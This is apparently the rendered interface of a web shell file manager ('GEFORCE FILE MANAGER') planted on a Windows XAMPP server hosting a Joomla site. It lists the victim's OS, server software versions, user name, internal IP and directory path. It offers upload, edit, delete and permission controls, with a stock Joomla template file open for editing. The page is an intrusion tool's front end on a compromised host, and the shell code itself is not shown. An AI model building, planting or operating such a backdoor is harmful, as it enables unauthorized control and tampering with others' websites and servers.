[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
templates
/
beez3
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 css
SET
[ DEL ]
📁 html
SET
[ DEL ]
📁 images
SET
[ DEL ]
📁 javascript
SET
[ DEL ]
📁 language
SET
[ DEL ]
📄 component.php
2,017 B
SET
[ EDIT ]
|
[ DEL ]
📄 error.php
8,505 B
SET
[ EDIT ]
|
[ DEL ]
📄 favicon.ico
2,019 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
8,857 B
SET
[ EDIT ]
|
[ DEL ]
📄 jsstrings.php
1,433 B
SET
[ EDIT ]
|
[ DEL ]
📄 templateDetails.xml
4,597 B
SET
[ EDIT ]
|
[ DEL ]
📄 template_preview.png
118,531 B
SET
[ EDIT ]
|
[ DEL ]
📄 template_thumbnail.png
21,957 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: jsstrings.php
<?php /** * @package Joomla.Site * @subpackage Templates.beez3 * * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ // No direct access. defined('_JEXEC') or die; JText::script('TPL_BEEZ3_ALTOPEN'); JText::script('TPL_BEEZ3_ALTCLOSE'); JText::script('TPL_BEEZ3_TEXTRIGHTOPEN'); JText::script('TPL_BEEZ3_TEXTRIGHTCLOSE'); JText::script('TPL_BEEZ3_FONTSIZE'); JText::script('TPL_BEEZ3_BIGGER'); JText::script('TPL_BEEZ3_RESET'); JText::script('TPL_BEEZ3_SMALLER'); JText::script('TPL_BEEZ3_INCREASE_SIZE'); JText::script('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT'); JText::script('TPL_BEEZ3_DECREASE_SIZE'); JText::script('TPL_BEEZ3_OPENMENU'); JText::script('TPL_BEEZ3_CLOSEMENU'); $this->addScriptDeclaration(" var big = '" . (int) $this->params->get('wrapperLarge') . "%'; var small = '" . (int) $this->params->get('wrapperSmall') . "%'; var bildauf = '" . $this->baseurl . '/templates/' . $this->template . "/images/plus.png'; var bildzu = '" . $this->baseurl . '/templates/' . $this->template . "/images/minus.png'; var rightopen = '" . JText::_('TPL_BEEZ3_TEXTRIGHTOPEN', true) . "'; var rightclose = '" . JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE', true) . "'; var altopen = '" . JText::_('TPL_BEEZ3_ALTOPEN', true) . "'; var altclose = '" . JText::_('TPL_BEEZ3_ALTCLOSE', true) . "'; ");